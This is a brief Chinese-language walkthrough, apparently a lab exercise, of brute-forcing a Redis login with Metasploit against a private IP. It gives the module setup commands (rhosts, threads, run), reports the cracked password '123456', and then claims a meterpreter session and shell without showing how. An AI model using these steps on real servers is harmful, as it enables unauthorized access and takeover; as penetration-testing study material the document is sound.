爆破redis的login登陆密码
进入msf框架
搜索有关redis的模块

调用模块并设置参数
use 5 (5是指的id)
show options 查看需要配置什么参数
set rhosts 172.16.124.133 设置目标IP
set threads 10 设置线程
这里使用的是默认的字典

run 运行

爆破得到密码为123456
得到详细信息

显示版本信息

取得最高权限


成功进入meterpreter扩张模块
输入shell进入会话框










